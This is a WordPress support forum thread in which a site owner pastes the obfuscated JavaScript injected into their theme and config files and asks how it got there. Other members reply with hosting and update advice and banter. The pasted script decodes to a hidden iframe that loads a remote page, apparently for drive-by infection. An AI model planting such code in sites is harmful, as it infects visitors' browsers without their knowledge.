Support » Fixing WordPress » got hacked

  • hi,
    the following script had been inserted to my blog:

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?><?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    after the insertion my website only displayed a white screen and a popup to run activex was appearing.In the left bottom of the browser i was seeing a weird link saying: http://www.wp-stats-php.info/iframe/wp-stats.php
    i opend the source file and i saw that the script is found on the top and the bottom.
    i checked all my theme php files and the script was also there and on my config.php, index.php too so i delete the script from every file where it was inserted. The problem was solved

    NOW THE QUESTION IS HOW WAS THIS SCRIPT INSERTED AND HOW CAN IT BE AVOIDED?

    I am using using wordpress 2.5 with the following plugins:
    -scf2-contact-form
    -simplemodal-contact-form-smcf
    -ibox
    -dailytop10

    thanks in advance for any clarification

Viewing 15 replies - 16 through 30 (of 57 total)
  • lemme jump in on the dogpile too…

    The real problem here is PHP itself, it makes it way too easy to build websites with hard-to-find vulnerabilities, so much so that even experienced PHP coders like those at WordPress screw up periodically.

    “easy to build websites with hard to find vulnerabilities”

    I’m surprised the universe didn’t implode when you said that. If it’s easy to build… then surely it’s easier to find the vulnerabilities than if it were HARD to build with it, right?

    What’s your point anyway? You want something absolutely bug-free? Sorry it doesn’t exist.

    The more popular something becomes, the bigger a target it is. You chose wordpress because everyone thinks it’s great. That’s the same reason the hackers are after it.

    Deal, or switch to a publishing platform nobody’s ever heard of. It won’t be any more secure, but you’ll feel safer because you don’t have a big red target painted on your ass.

    Trade ease of use, compatibility and extensibility for obscurity, then we’ll see you on their forum complaining that they don’t have as many nice features as wordpress.

    **All my 4 domians hosted under the same account( not all using wordpress) are now down because some guys working on wordpress didn’t have time to check their code for bugs!

    Nope. That dog won’t hunt. Your sites are down because you are probably on a shared server. It’s only as safe as the least secure user on it. That very well might be you, given your stunning ignorance of your situation, but it might be someone else on that shared server.

    Blaming WordPress for every problem you are experiencing with your WordPress and non-WordPress sites … well it just leaves me speechless. People are hacked not because they are running WordPress, but because of PHP vulnerabilities. So it’s not just a WordPress issue.

    And yeah, upgrade your damn installs when you are supposed to and spare yourself (and the rest of us) some grief.

    general unsolicited advice:

    1) pay $5 more per month and use a VPS. Having your own apartment is nicer, plus you discover wonderous new possibilities.

    2) keep your wordpress up-to-date. It’s not easy if you like to tinker, but do it anyway.

    3) research your plugins before you upload them, see if people have had any security issues with them.

    4) keep your plugins updated, and actually remove any plugins you don’t intend to use, don’t just deactivate them.

    5) read this, then read it again.

    6) actually DO what it says once you’ve read it.

    That dog won’t hunt

    wow, that’s a real saying? I thought Dr Phil was just talking out of his arse, I didn’t realise all texans did it :P~~

    Blaming WordPress for every problem you are experience with your WordPress and non-WordPress sites

    the hack was made just after some days of the launch of a new wordpress powered website

    Yep. And while we’re at it:
    Y’all .. singular
    All y’all .. plural 😛

    Zizak, that could well just be a coincidence. The problem is, as I said, that in a shared hosting environment, you just can’t ever be certain HOW a hacker gained access to your site and its files. Even if he used WP to hack your site, that doesn’t necessarily mean he gained access to the server through YOU.

    Please do read the link that Ivovic posted above.

    The biggest problem I see with WP hackery and why it’s so attractive is that there are just scads of folks out there new to the web, new to having their own server space, new to WordPress, who just slap WordPress up (often via Fantastico), and then don’t think another thing about it. They don’t familiarize themselves with even the most BASIC concepts of site security. This is a hacker’s dream come true. So unless the unwashed WP masses out there EDUCATE THEMSELVES (knowledge has been and always will be power, people!), this won’t abate.

    my all-time favourite southernism is “all y’all” 😉

    as in “all y’all should get to readin’ about wordpress security”

    whooami

    (@whooami)

    Member

    1) pay $5 more per month and use a VPS. Having your own apartment is nicer, plus you discover wonderous new possibilities.

    hahah, yeah, right — that’s advice thats going to nowhere. We are largely, as Joni says, dealing with squabs. Cheap squabs, too. ( and no you cant have that word as it relates to WP, I plan on using it 😛 ).

    besides, being on shared hosting isnt a problem, prima facie. LOTS and LOTS of people do just fine on shared hosting, and NEVER have these sorts of problems.

    that *is* true, but with people running around chmodding everything to 777… that’s gotta be reaching critical mass at some point.

    Anyway, that point wasn’t *just* about security, it is much nicer having a certain amount of allocated cpu and ram, especially now that wordpress is getting a little hungrier.

    I agree with you though… a) it’s not the most important point I’ve ever made, and b) none of these guys want to pay that much per year, let alone per month.

    whooami

    (@whooami)

    Member

    that *is* true, but with people running around chmodding everything to 777… that’s gotta be reaching critical mass at some point.

    thats why those of us that are not squabs get off those shared hosts. I am all for squab-webhosting.com setting up shop.

    Let them chmod 777 all they want. 🙂

    Eventually, those people will all end up back here.

    squabsr.us is available 😉

    [offtopic]Sorry to interfere but a VPS isnt a solution. A good shared hosting in a good hosting company is IMHO a lot safer than a cheap VPS in a bad hosting company. Especially when most of ppl CANNOT administrate a server! That’s a hacker’s dream![/offtopic]

    whooami

    (@whooami)

    Member

    dueced, that is so true.

    ivovic, dude! I just found a better one thats available, wanna go into bidness?

    I feel parasites squirming around my intestines just thinking about it… I think that’s a sign! 😉

    If I thought there was a legitimate credit card transaction among them, I’d seriously consider it.

    edit: if by chance you’re not totally joking, I’m curious 🙂

Viewing 15 replies - 16 through 30 (of 57 total)
  • The topic ‘got hacked’ is closed to new replies.